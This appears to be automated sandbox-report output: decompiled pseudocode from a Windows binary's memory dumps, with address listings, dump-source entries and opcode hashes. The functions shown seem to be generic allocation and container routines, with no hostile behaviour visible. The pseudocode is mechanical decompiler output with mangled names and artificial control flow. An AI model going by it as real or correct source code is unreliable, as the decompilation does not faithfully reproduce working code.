                    																			_t98 = _a4;
                    																			__eflags = _t178 - 0x3ffffff;
                    																			if(__eflags > 0) {
                    																				E013FDA71(_t173, _t178, _t199, __eflags);
                    																				goto L48;
                    																			} else {
                    																				_t178 = _t178 << 6;
                    																				__eflags = _t178 - 0x1000;
                    																				if(_t178 < 0x1000) {
                    																					L46:
                    																					return L013CDA60(_t98);
                    																				} else {
                    																					__eflags = _t98 & 0x0000001f;
                    																					if(__eflags != 0) {
                    																						L48:
                    																						E013FDA71(_t173, _t178, _t199, __eflags);
                    																						goto L49;
                    																					} else {
                    																						_t178 =  *(_t98 - 4);
                    																						__eflags = _t178 - _t98;
                    																						if(__eflags >= 0) {
                    																							L49:
                    																							E013FDA71(_t173, _t178, _t199, __eflags);
                    																							goto L50;
                    																						} else {
                    																							_t158 = _t98 - _t178;
                    																							__eflags = _t158 - 4;
                    																							if(__eflags < 0) {
                    																								L50:
                    																								E013FDA71(_t173, _t178, _t199, __eflags);
                    																								goto L51;
                    																							} else {
                    																								__eflags = _t158 - 0x23;
                    																								if(__eflags > 0) {
                    																									L51:
                    																									E013FDA71(_t173, _t178, _t199, __eflags);
                    																									asm("int3");
                    																									asm("int3");
                    																									asm("int3");
                    																									asm("int3");
                    																									asm("int3");
                    																									asm("int3");
                    																									asm("int3");
                    																									asm("int3");
                    																									asm("int3");
                    																									_t104 = _a8;
                    																									_t179 = _a4;
                    																									__eflags = _t104 - 0x15555555;
                    																									if(__eflags > 0) {
                    																										E013FDA71(_t173, _t179, _t199, __eflags);
                    																										goto L61;
                    																									} else {
                    																										__eflags = _t104 + _t104 * 2 << 2 - 0x1000;
                    																										if(_t104 + _t104 * 2 << 2 < 0x1000) {
                    																											L59:
                    																											return L013CDA60(_t179);
                    																										} else {
                    																											__eflags = _t179 & 0x0000001f;
                    																											if(__eflags != 0) {
                    																												L61:
                    																												E013FDA71(_t173, _t179, _t199, __eflags);
                    																												goto L62;
                    																											} else {
                    																												_t156 =  *(_t179 - 4);
                    																												__eflags = _t156 - _t179;
                    																												if(__eflags >= 0) {
                    																													L62:
                    																													E013FDA71(_t173, _t179, _t199, __eflags);
                    																													goto L63;
                    																												} else {
                    																													_t179 = _t179 - _t156;
                    																													__eflags = _t179 - 4;
                    																													if(__eflags < 0) {
                    																														L63:
                    																														E013FDA71(_t173, _t179, _t199, __eflags);
                    																														goto L64;
                    																													} else {
                    																														__eflags = _t179 - 0x23;
                    																														if(__eflags > 0) {
                    																															L64:
                    																															E013FDA71(_t173, _t179, _t199, __eflags);
                    																															asm("int3");
                    																															asm("int3");
                    																															asm("int3");
                    																															asm("int3");
                    																															asm("int3");
                    																															asm("int3");
                    																															asm("int3");
                    																															_t110 = _a8;
                    																															_t180 = _a4;
                    																															__eflags = _t110 - 0xaaaaaaa;
                    																															if(__eflags > 0) {
                    																																E013FDA71(_t173, _t180, _t199, __eflags);
                    																																goto L74;
                    																															} else {
                    																																__eflags = _t110 + _t110 * 2 << 3 - 0x1000;
                    																																if(_t110 + _t110 * 2 << 3 < 0x1000) {
                    																																	L72:
                    																																	return L013CDA60(_t180);
                    																																} else {
                    																																	__eflags = _t180 & 0x0000001f;
                    																																	if(__eflags != 0) {
                    																																		L74:
                    																																		E013FDA71(_t173, _t180, _t199, __eflags);
                    																																		goto L75;
                    																																	} else {
                    																																		_t152 =  *(_t180 - 4);
                    																																		__eflags = _t152 - _t180;
                    																																		if(__eflags >= 0) {
                    																																			L75:
                    																																			E013FDA71(_t173, _t180, _t199, __eflags);
                    																																			goto L76;
                    																																		} else {
                    																																			_t180 = _t180 - _t152;
                    																																			__eflags = _t180 - 4;
                    																																			if(__eflags < 0) {
                    																																				L76:
                    																																				E013FDA71(_t173, _t180, _t199, __eflags);
                    																																				goto L77;
                    																																			} else {
                    																																				__eflags = _t180 - 0x23;
                    																																				if(__eflags > 0) {
                    																																					L77:
                    																																					E013FDA71(_t173, _t180, _t199, __eflags);
                    																																					asm("int3");
                    																																					asm("int3");
                    																																					asm("int3");
                    																																					asm("int3");
                    																																					asm("int3");
                    																																					asm("int3");
                    																																					asm("int3");
                    																																					_t231 = _t234;
                    																																					_push(0xffffffff);
                    																																					_push(E01418180);
                    																																					_push( *[fs:0x0]);
                    																																					_push(_t173);
                    																																					_t117 =  *0x1435234; // 0x78d9f939
                    																																					_push(_t117 ^ _t234);
                    																																					 *[fs:0x0] =  &_v16;
                    																																					_v20 = _t234 - 0x10;
                    																																					_t174 = _t180;
                    																																					_v32 = _t174;
                    																																					_t181 =  *(_t174 + 4);
                    																																					_t213 = _a4;
                    																																					_t201 = _t181 -  *_t174;
                    																																					_t121 = 0x2aaaaaab * _t201;
                    																																					_t222 = (0x2aaaaaab * _t201 >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * _t201 >> 0x20 >> 2);
                    																																					_v28 = _t222;
                    																																					__eflags = _t222 - _t213;
                    																																					if(__eflags <= 0) {
                    																																						if(__eflags >= 0) {
                    																																							goto L84;
                    																																						} else {
                    																																							_t204 = _a8;
                    																																							__eflags = _t204 - _t181;
                    																																							if(_t204 >= _t181) {
                    																																								L89:
                    																																								__eflags = _t213 - _t222;
                    																																								E013EC250(_t174, _t174, _t222, _t231, _t213 - _t222);
                    																																							} else {
                    																																								_t138 =  *_t174;
                    																																								__eflags = _t138 - _t204;
                    																																								if(_t138 > _t204) {
                    																																									goto L89;
                    																																								} else {
                    																																									_t228 = (0x2aaaaaab * (_t204 - _t138) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t204 - _t138) >> 0x20 >> 2);
                    																																									E013EC250(_t174, _t174, _t228, _t231, _t213 - _v28);
                    																																									_a8 =  *_t174 + (_t228 + _t228 * 2) * 8;
                    																																								}
                    																																							}
                    																																							_push(_a8);
                    																																							_v8 = 0;
                    																																							_push(_t174);
                    																																							E013EABB0( *(_t174 + 4), _t213 - (0x2aaaaaab * ( *(_t174 + 4) -  *_t174) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *(_t174 + 4) -  *_t174) >> 0x20 >> 2), _a8);
                    																																							_t137 = _t213 - (0x2aaaaaab * ( *(_t174 + 4) -  *_t174) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *(_t174 + 4) -  *_t174) >> 0x20 >> 2) + (_t213 - (0x2aaaaaab * ( *(_t174 + 4) -  *_t174) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *(_t174 + 4) -  *_t174) >> 0x20 >> 2)) * 2 << 3;
                    																																							_t80 = _t174 + 4;
                    																																							 *_t80 =  *(_t174 + 4) + _t137;
                    																																							__eflags =  *_t80;
                    																																							 *[fs:0x0] = _v16;
                    																																							return _t137;
                    																																						}
                    																																					} else {
                    																																						_t121 = _t181 + (_t213 - _t222 + (_t213 - _t222) * 2) * 8;
                    																																						_a8 = _t121;
                    																																						_t229 = _t121;
                    																																						__eflags = _t121 - _t181;
                    																																						if(_t121 != _t181) {
                    																																							_t218 = _t181;
                    																																							do {
                    																																								 *((intOrPtr*)( *_t229))(0);
                    																																								_t229 = _t229 + 0x18;
                    																																								__eflags = _t229 - _t218;
                    																																							} while (_t229 != _t218);
                    																																							_t121 = _a8;
                    																																						}
                    																																						 *(_t174 + 4) = _t121;
                    																																						L84:
                    																																						 *[fs:0x0] = _v16;
                    																																						return _t121;
                    																																					}
                    																																				} else {
                    																																					_t180 = _t152;
                    																																					goto L72;
                    																																				}
                    																																			}
                    																																		}
                    																																	}
                    																																}
                    																															}
                    																														} else {
                    																															_t179 = _t156;
                    																															goto L59;
                    																														}
                    																													}
                    																												}
                    																											}
                    																										}
                    																									}
                    																								} else {
                    																									_t98 = _t178;
                    																									goto L46;
                    																								}
                    																							}
                    																						}
                    																					}
                    																				}
                    																			}
                    																		} else {
                    																			_t163 = _t177 + 0x00000023 & 0xffffffe0;
                    																			__eflags = _t163;
                    																			 *(_t163 - 4) = _t177;
                    																			return _t163;
                    																		}
                    																	}
                    																}
                    															}
                    														} else {
                    															L27:
                    															return _t93;
                    														}
                    													} else {
                    														_t9 = _t177 + 0x23; // 0x23
                    														_t168 = _t9 & 0xffffffe0;
                    														__eflags = _t168;
                    														 *(_t168 - 4) = _t177;
                    														return _t168;
                    													}
                    												}
                    											}
                    										}
                    									} else {
                    										L14:
                    										return _t88;
                    									}
                    								} else {
                    									_t3 = _t177 + 0x23; // 0x23
                    									_t172 = _t3 & 0xffffffe0;
                    									__eflags = _t172;
                    									 *(_t172 - 4) = _t177;
                    									return _t172;
                    								}
                    							}
                    						}
                    					}
                    				} else {
                    					L1:
                    					return _t83;
                    				}
                    			}











































                    0x013ec3a0
                    0x013ec3a0
                    0x013ec3a0
                    0x013ec3a6
                    0x013ec3ab
                    0x013ec3b0
                    0x013ec3ed
                    0x00000000
                    0x013ec3b2
                    0x013ec3b2
                    0x013ec3b5
                    0x013ec3ba
                    0x013ec3df
                    0x013ec3e4
                    0x013ec3e7
                    0x013ec3e9
                    0x00000000
                    0x013ec3eb
                    0x00000000
                    0x013ec3eb
                    0x013ec3bc
                    0x013ec3bc
                    0x013ec3bc
                    0x013ec3bf
                    0x013ec3c1
                    0x013ec3f2
                    0x013ec3f2
                    0x00000000
                    0x013ec3c3
                    0x013ec3c9
                    0x013ec3cb
                    0x013ec3ce
                    0x013ec3d0
                    0x013ec3f7
                    0x013ec3f7
                    0x013ec3fc
                    0x013ec3fc
                    0x013ec401
                    0x013ec402
                    0x013ec403
                    0x013ec404
                    0x013ec405
                    0x013ec406
                    0x013ec407
                    0x013ec408
                    0x013ec409
                    0x013ec40a
                    0x013ec40b
                    0x013ec40c
                    0x013ec40d
                    0x013ec40e
                    0x013ec40f
                    0x013ec410
                    0x013ec414
                    0x013ec416
                    0x013ec41b
                    0x013ec420
                    0x013ec460
                    0x00000000
                    0x013ec422
                    0x013ec425
                    0x013ec428
                    0x013ec42d
                    0x013ec452
                    0x013ec457
                    0x013ec45a
                    0x013ec45c
                    0x00000000
                    0x013ec45e
                    0x00000000
                    0x013ec45e
                    0x013ec42f
                    0x013ec42f
                    0x013ec42f
                    0x013ec432
                    0x013ec434
                    0x013ec465
                    0x013ec465
                    0x00000000
                    0x013ec436
                    0x013ec43c
                    0x013ec43e
                    0x013ec441
                    0x013ec443
                    0x013ec46a
                    0x013ec46a
                    0x013ec46f
                    0x013ec46f
                    0x013ec474
                    0x013ec475
                    0x013ec476
                    0x013ec477
                    0x013ec478
                    0x013ec479
                    0x013ec47a
                    0x013ec47b
                    0x013ec47c
                    0x013ec47d
                    0x013ec47e
                    0x013ec47f
                    0x013ec480
                    0x013ec484
                    0x013ec486
                    0x013ec48b
                    0x013ec490
                    0x013ec4d0
                    0x00000000
                    0x013ec492
                    0x013ec495
                    0x013ec498
                    0x013ec49d
                    0x013ec4c2
                    0x013ec4c7
                    0x013ec4ca
                    0x013ec4cc
                    0x00000000
                    0x013ec4ce
                    0x00000000
                    0x013ec4ce
                    0x013ec49f
                    0x013ec49f
                    0x013ec4a2
                    0x013ec4a4
                    0x013ec4d5
                    0x013ec4d5
                    0x00000000
                    0x013ec4a6
                    0x013ec4ac
                    0x013ec4ae
                    0x013ec4b1
                    0x013ec4b3
                    0x013ec4da
                    0x013ec4da
                    0x013ec4df
                    0x013ec4df
                    0x013ec4e4
                    0x013ec4e5
                    0x013ec4e6
                    0x013ec4e7
                    0x013ec4e8
                    0x013ec4e9
                    0x013ec4ea
                    0x013ec4eb
                    0x013ec4ec
                    0x013ec4ed
                    0x013ec4ee
                    0x013ec4ef
                    0x013ec4f0
                    0x013ec4f4
                    0x013ec4f8
                    0x013ec4fe
                    0x013ec52e
                    0x00000000
                    0x013ec500
                    0x013ec500
                    0x013ec503
                    0x013ec509
                    0x013ec524
                    0x013ec52b
                    0x013ec50b
                    0x013ec50b
                    0x013ec50d
                    0x013ec533
                    0x013ec533
                    0x00000000
                    0x013ec50f
                    0x013ec50f
                    0x013ec512
                    0x013ec514
                    0x013ec538
                    0x013ec538
                    0x00000000
                    0x013ec516
                    0x013ec516
                    0x013ec518
                    0x013ec51b
                    0x013ec53d
                    0x013ec53d
                    0x00000000
                    0x013ec51d
                    0x013ec51d
                    0x013ec520
                    0x013ec542
                    0x013ec542
                    0x013ec547
                    0x013ec548
                    0x013ec549
                    0x013ec54a
                    0x013ec54b
                    0x013ec54c
                    0x013ec54d
                    0x013ec54e
                    0x013ec54f
                    0x013ec550
                    0x013ec554
                    0x013ec558
                    0x013ec55d
                    0x013ec590
                    0x00000000
                    0x013ec55f
                    0x013ec565
                    0x013ec56a
                    0x013ec586
                    0x013ec58d
                    0x013ec56c
                    0x013ec56c
                    0x013ec56f
                    0x013ec595
                    0x013ec595
                    0x00000000
                    0x013ec571
                    0x013ec571
                    0x013ec574
                    0x013ec576
                    0x013ec59a
                    0x013ec59a
                    0x00000000
                    0x013ec578
                    0x013ec578
                    0x013ec57a
                    0x013ec57d
                    0x013ec59f
                    0x013ec59f
                    0x00000000
                    0x013ec57f
                    0x013ec57f
                    0x013ec582
                    0x013ec5a4
                    0x013ec5a4
                    0x013ec5a9
                    0x013ec5aa
                    0x013ec5ab
                    0x013ec5ac
                    0x013ec5ad
                    0x013ec5ae
                    0x013ec5af
                    0x013ec5b0
                    0x013ec5b4
                    0x013ec5b8
                    0x013ec5bd
                    0x013ec5f0
                    0x00000000
                    0x013ec5bf
                    0x013ec5c5
                    0x013ec5ca
                    0x013ec5e6
                    0x013ec5ed
                    0x013ec5cc
                    0x013ec5cc
                    0x013ec5cf
                    0x013ec5f5
                    0x013ec5f5
                    0x00000000
                    0x013ec5d1
                    0x013ec5d1
                    0x013ec5d4
                    0x013ec5d6
                    0x013ec5fa
                    0x013ec5fa
                    0x00000000
                    0x013ec5d8
                    0x013ec5d8
                    0x013ec5da
                    0x013ec5dd
                    0x013ec5ff
                    0x013ec5ff
                    0x00000000
                    0x013ec5df
                    0x013ec5df
                    0x013ec5e2
                    0x013ec604
                    0x013ec604
                    0x013ec609
                    0x013ec60a
                    0x013ec60b
                    0x013ec60c
                    0x013ec60d
                    0x013ec60e
                    0x013ec60f
                    0x013ec611
                    0x013ec613
                    0x013ec615
                    0x013ec620
                    0x013ec624
                    0x013ec627
                    0x013ec62e
                    0x013ec632
                    0x013ec638
                    0x013ec63b
                    0x013ec63d
                    0x013ec640
                    0x013ec648
                    0x013ec64d
                    0x013ec64f
                    0x013ec659
                    0x013ec65b
                    0x013ec65e
                    0x013ec660
                    0x013ec69e
                    0x00000000
                    0x013ec6a0
                    0x013ec6a0
                    0x013ec6a3
                    0x013ec6a5
                    0x013ec6da
                    0x013ec6de
                    0x013ec6e1
                    0x013ec6a7
                    0x013ec6a7
                    0x013ec6a9
                    0x013ec6ab
                    0x00000000
                    0x013ec6ad
                    0x013ec6c6
                    0x013ec6c8
                    0x013ec6d5
                    0x013ec6d5
                    0x013ec6ab
                    0x013ec6ee
                    0x013ec6f3
                    0x013ec6fe
                    0x013ec712
                    0x013ec735
                    0x013ec738
                    0x013ec738
                    0x013ec738
                    0x013ec73e
                    0x013ec74c
                    0x013ec74c
                    0x013ec662
                    0x013ec667
                    0x013ec66a
                    0x013ec66d
                    0x013ec66f
                    0x013ec671
                    0x013ec673
                    0x013ec675
                    0x013ec67b
                    0x013ec67d
                    0x013ec680
                    0x013ec680
                    0x013ec684
                    0x013ec684
                    0x013ec687
                    0x013ec68a
                    0x013ec68d
                    0x013ec69b
                    0x013ec69b
                    0x013ec5e4
                    0x013ec5e4
                    0x00000000
                    0x013ec5e4
                    0x013ec5e2
                    0x013ec5dd
                    0x013ec5d6
                    0x013ec5cf
                    0x013ec5ca
                    0x013ec584
                    0x013ec584
                    0x00000000
                    0x013ec584
                    0x013ec582
                    0x013ec57d
                    0x013ec576
                    0x013ec56f
                    0x013ec56a
                    0x013ec522
                    0x013ec522
                    0x00000000
                    0x013ec522
                    0x013ec520
                    0x013ec51b
                    0x013ec514
                    0x013ec50d
                    0x013ec509
                    0x013ec4b5
                    0x013ec4b8
                    0x013ec4b8
                    0x013ec4bb
                    0x013ec4be
                    0x013ec4be
                    0x013ec4b3
                    0x013ec4a4
                    0x013ec49d
                    0x013ec488
                    0x013ec488
                    0x013ec488
                    0x013ec488
                    0x013ec445
                    0x013ec445
                    0x013ec448
                    0x013ec448
                    0x013ec44b
                    0x013ec44e
                    0x013ec44e
                    0x013ec443
                    0x013ec434
                    0x013ec42d
                    0x013ec418
                    0x013ec418
                    0x013ec418
                    0x013ec418
                    0x013ec3d2
                    0x013ec3d2
                    0x013ec3d5
                    0x013ec3d5
                    0x013ec3d8
                    0x013ec3db
                    0x013ec3db
                    0x013ec3d0
                    0x013ec3c1
                    0x013ec3ba
                    0x013ec3a8
                    0x013ec3a8
                    0x013ec3a8
                    0x013ec3a8

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: db2e6d724a65768649ffc4e33d32ffbd3b2d2ce27da2207b0f177cd2ae6e7a41
                    • Instruction ID: e187e9d28f48d552988b9cfe2c56299318a0b69c14fd7f4ab446558d0d338ed6
                    • Opcode Fuzzy Hash: db2e6d724a65768649ffc4e33d32ffbd3b2d2ce27da2207b0f177cd2ae6e7a41
                    • Instruction Fuzzy Hash: 46F05CF594031245FB29AB7C840C55E71C88F3025D7005A3DD736D11D0EB2CCA548117
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 70%
                    			E013E2C10(void* __ebx, void* __edx, void* __ebp, signed char _a4, signed int _a8) {
                    				intOrPtr _v4;
                    				char _v8;
                    				signed int _t17;
                    				signed int _t22;
                    				signed char _t33;
                    				signed int _t34;
                    				signed int _t37;
                    				void* _t38;
                    				signed char _t40;
                    				intOrPtr* _t41;
                    				void* _t43;
                    				signed char _t45;
                    				void* _t48;
                    
                    				_t43 = __edx;
                    				_t38 = __ebx;
                    				_t17 = _a4;
                    				if(_t17 != 0) {
                    					__eflags = _t17 - 0x3fffffff;
                    					if(__eflags > 0) {
                    						E013F3465(__eflags);
                    						goto L10;
                    					} else {
                    						_t34 = _t17 << 2;
                    						__eflags = _t34 - 0x1000;
                    						if(__eflags < 0) {
                    							_t17 = E013F21A5(__eflags, _t34);
                    							_t48 = _t48 + 4;
                    							__eflags = _t17;
                    							if(__eflags != 0) {
                    								goto L1;
                    							} else {
                    								goto L12;
                    							}
                    						} else {
                    							_t39 = _t34 + 0x23;
                    							__eflags = _t34 + 0x23 - _t34;
                    							if(__eflags <= 0) {
                    								L10:
                    								E013F3465(__eflags);
                    								goto L11;
                    							} else {
                    								_t39 = E013F21A5(__eflags, _t39);
                    								_t48 = _t48 + 4;
                    								__eflags = _t39;
                    								if(__eflags == 0) {
                    									L11:
                    									E013FDA71(_t38, _t39, _t43, __eflags);
                    									L12:
                    									E013FDA71(_t38, _t39, _t43, __eflags);
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									_t22 = _a8;
                    									_t40 = _a4;
                    									__eflags = _t22 - 0x3fffffff;
                    									if(__eflags > 0) {
                    										E013FDA71(_t38, _t40, _t43, __eflags);
                    										goto L22;
                    									} else {
                    										__eflags = _t22 << 2 - 0x1000;
                    										if(_t22 << 2 < 0x1000) {
                    											L20:
                    											return L013CDA60(_t40);
                    										} else {
                    											__eflags = _t40 & 0x0000001f;
                    											if(__eflags != 0) {
                    												L22:
                    												E013FDA71(_t38, _t40, _t43, __eflags);
                    												goto L23;
                    											} else {
                    												_t33 =  *(_t40 - 4);
                    												__eflags = _t33 - _t40;
                    												if(__eflags >= 0) {
                    													L23:
                    													E013FDA71(_t38, _t40, _t43, __eflags);
                    													goto L24;
                    												} else {
                    													_t40 = _t40 - _t33;
                    													__eflags = _t40 - 4;
                    													if(__eflags < 0) {
                    														L24:
                    														E013FDA71(_t38, _t40, _t43, __eflags);
                    														goto L25;
                    													} else {
                    														__eflags = _t40 - 0x23;
                    														if(__eflags > 0) {
                    															L25:
                    															E013FDA71(_t38, _t40, _t43, __eflags);
                    															asm("int3");
                    															asm("int3");
                    															asm("int3");
                    															asm("int3");
                    															asm("int3");
                    															asm("int3");
                    															asm("int3");
                    															asm("int3");
                    															asm("int3");
                    															asm("int3");
                    															_t45 = _a4;
                    															_t41 = _t45 + 4;
                    															_v4 = 0;
                    															 *_t45 = 0x141ce3c;
                    															_v8 = 1;
                    															 *_t41 = 0;
                    															 *((intOrPtr*)(_t41 + 4)) = 0;
                    															 *((intOrPtr*)(_t41 + 8)) = 0;
                    															E013E29F0(_t41, 1,  &_v8);
                    															return _t45;
                    														} else {
                    															_t40 = _t33;
                    															goto L20;
                    														}
                    													}
                    												}
                    											}
                    										}
                    									}
                    								} else {
                    									_t3 = _t39 + 0x23; // 0x23
                    									_t37 = _t3 & 0xffffffe0;
                    									__eflags = _t37;
                    									 *(_t37 - 4) = _t39;
                    									return _t37;
                    								}
                    							}
                    						}
                    					}
                    				} else {
                    					L1:
                    					return _t17;
                    				}
                    			}
















                    0x013e2c10
                    0x013e2c10
                    0x013e2c10
                    0x013e2c16
                    0x013e2c1b
                    0x013e2c20
                    0x013e2c5d
                    0x00000000
                    0x013e2c22
                    0x013e2c22
                    0x013e2c25
                    0x013e2c2a
                    0x013e2c4f
                    0x013e2c54
                    0x013e2c57
                    0x013e2c59
                    0x00000000
                    0x013e2c5b
                    0x00000000
                    0x013e2c5b
                    0x013e2c2c
                    0x013e2c2c
                    0x013e2c2f
                    0x013e2c31
                    0x013e2c62
                    0x013e2c62
                    0x00000000
                    0x013e2c33
                    0x013e2c39
                    0x013e2c3b
                    0x013e2c3e
                    0x013e2c40
                    0x013e2c67
                    0x013e2c67
                    0x013e2c6c
                    0x013e2c6c
                    0x013e2c71
                    0x013e2c72
                    0x013e2c73
                    0x013e2c74
                    0x013e2c75
                    0x013e2c76
                    0x013e2c77
                    0x013e2c78
                    0x013e2c79
                    0x013e2c7a
                    0x013e2c7b
                    0x013e2c7c
                    0x013e2c7d
                    0x013e2c7e
                    0x013e2c7f
                    0x013e2c80
                    0x013e2c84
                    0x013e2c88
                    0x013e2c8d
                    0x013e2cbd
                    0x00000000
                    0x013e2c8f
                    0x013e2c92
                    0x013e2c97
                    0x013e2cb3
                    0x013e2cba
                    0x013e2c99
                    0x013e2c99
                    0x013e2c9c
                    0x013e2cc2
                    0x013e2cc2
                    0x00000000
                    0x013e2c9e
                    0x013e2c9e
                    0x013e2ca1
                    0x013e2ca3
                    0x013e2cc7
                    0x013e2cc7
                    0x00000000
                    0x013e2ca5
                    0x013e2ca5
                    0x013e2ca7
                    0x013e2caa
                    0x013e2ccc
                    0x013e2ccc
                    0x00000000
                    0x013e2cac
                    0x013e2cac
                    0x013e2caf
                    0x013e2cd1
                    0x013e2cd1
                    0x013e2cd6
                    0x013e2cd7
                    0x013e2cd8
                    0x013e2cd9
                    0x013e2cda
                    0x013e2cdb
                    0x013e2cdc
                    0x013e2cdd
                    0x013e2cde
                    0x013e2cdf
                    0x013e2ce4
                    0x013e2cec
                    0x013e2cef
                    0x013e2cfa
                    0x013e2d00
                    0x013e2d08
                    0x013e2d0e
                    0x013e2d15
                    0x013e2d1c
                    0x013e2d27
                    0x013e2cb1
                    0x013e2cb1
                    0x00000000
                    0x013e2cb1
                    0x013e2caf
                    0x013e2caa
                    0x013e2ca3
                    0x013e2c9c
                    0x013e2c97
                    0x013e2c42
                    0x013e2c42
                    0x013e2c45
                    0x013e2c45
                    0x013e2c48
                    0x013e2c4b
                    0x013e2c4b
                    0x013e2c40
                    0x013e2c31
                    0x013e2c2a
                    0x013e2c18
                    0x013e2c18
                    0x013e2c18
                    0x013e2c18

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 68033fc793f9f572c03a4ba0ce76aa5b62524bf5acb5f1e25c83716251330b5a
                    • Instruction ID: 8c333e0dc73dd7136ffc5d2438a97a526bf57dc34df9d91aa8e222bda39508d1
                    • Opcode Fuzzy Hash: 68033fc793f9f572c03a4ba0ce76aa5b62524bf5acb5f1e25c83716251330b5a
                    • Instruction Fuzzy Hash: 0DF020AA94031202FF29ABFCC84D61FA1CC4E3026C7000A3DE727C21D0EA24C8A5811B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E013EC410(void* __ebx, void* __edx, signed char _a4, signed int _a8) {
                    				intOrPtr _v8;
                    				char _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v28;
                    				signed char _v32;
                    				void* __esi;
                    				signed int _t79;
                    				signed int _t84;
                    				signed char _t89;
                    				signed int _t95;
                    				signed int _t101;
                    				signed int _t108;
                    				signed int _t112;
                    				signed int _t128;
                    				void* _t129;
                    				signed char _t143;
                    				signed char _t147;
                    				void* _t149;
                    				signed int _t151;
                    				signed int _t154;
                    				signed int _t156;
                    				signed int _t159;
                    				void* _t160;
                    				signed char _t161;
                    				signed int _t165;
                    				signed char _t166;
                    				signed char _t167;
                    				signed int _t168;
                    				void* _t186;
                    				signed int _t188;
                    				signed int _t191;
                    				signed char _t200;
                    				signed int _t205;
                    				intOrPtr _t209;
                    				signed int _t215;
                    				signed int _t216;
                    				signed int _t221;
                    
                    				_t186 = __edx;
                    				_t160 = __ebx;
                    				_t79 = _a4;
                    				if(_t79 != 0) {
                    					__eflags = _t79 - 0x15555555;
                    					if(__eflags > 0) {
                    						E013F3465(__eflags);
                    						goto L10;
                    					} else {
                    						_t156 = _t79 + _t79 * 2 << 2;
                    						__eflags = _t156 - 0x1000;
                    						if(__eflags < 0) {
                    							_t79 = E013F21A5(__eflags, _t156);
                    							_t221 = _t221 + 4;
                    							__eflags = _t79;
                    							if(__eflags != 0) {
                    								goto L1;
                    							} else {
                    								goto L12;
                    							}
                    						} else {
                    							_t4 = _t156 + 0x23; // 0x23
                    							_t164 = _t4;
                    							__eflags = _t4 - _t156;
                    							if(__eflags <= 0) {
                    								L10:
                    								E013F3465(__eflags);
                    								goto L11;
                    							} else {
                    								_t164 = E013F21A5(__eflags, _t164);
                    								_t221 = _t221 + 4;
                    								__eflags = _t164;
                    								if(__eflags == 0) {
                    									L11:
                    									E013FDA71(_t160, _t164, _t186, __eflags);
                    									L12:
                    									E013FDA71(_t160, _t164, _t186, __eflags);
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									_t84 = _a4;
                    									__eflags = _t84;
                    									if(_t84 != 0) {
                    										__eflags = _t84 - 0xaaaaaaa;
                    										if(__eflags > 0) {
                    											E013F3465(__eflags);
                    											goto L23;
                    										} else {
                    											_t151 = _t84 + _t84 * 2 << 3;
                    											__eflags = _t151 - 0x1000;
                    											if(__eflags < 0) {
                    												_t84 = E013F21A5(__eflags, _t151);
                    												_t221 = _t221 + 4;
                    												__eflags = _t84;
                    												if(__eflags != 0) {
                    													goto L14;
                    												} else {
                    													goto L25;
                    												}
                    											} else {
                    												_t164 = _t151 + 0x23;
                    												__eflags = _t151 + 0x23 - _t151;
                    												if(__eflags <= 0) {
                    													L23:
                    													E013F3465(__eflags);
                    													goto L24;
                    												} else {
                    													_t164 = E013F21A5(__eflags, _t164);
                    													_t221 = _t221 + 4;
                    													__eflags = _t164;
                    													if(__eflags == 0) {
                    														L24:
                    														E013FDA71(_t160, _t164, _t186, __eflags);
                    														L25:
                    														E013FDA71(_t160, _t164, _t186, __eflags);
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														_t165 = _a8;
                    														_t89 = _a4;
                    														__eflags = _t165 - 0x3ffffff;
                    														if(__eflags > 0) {
                    															E013FDA71(_t160, _t165, _t186, __eflags);
                    															goto L35;
                    														} else {
                    															_t165 = _t165 << 6;
                    															__eflags = _t165 - 0x1000;
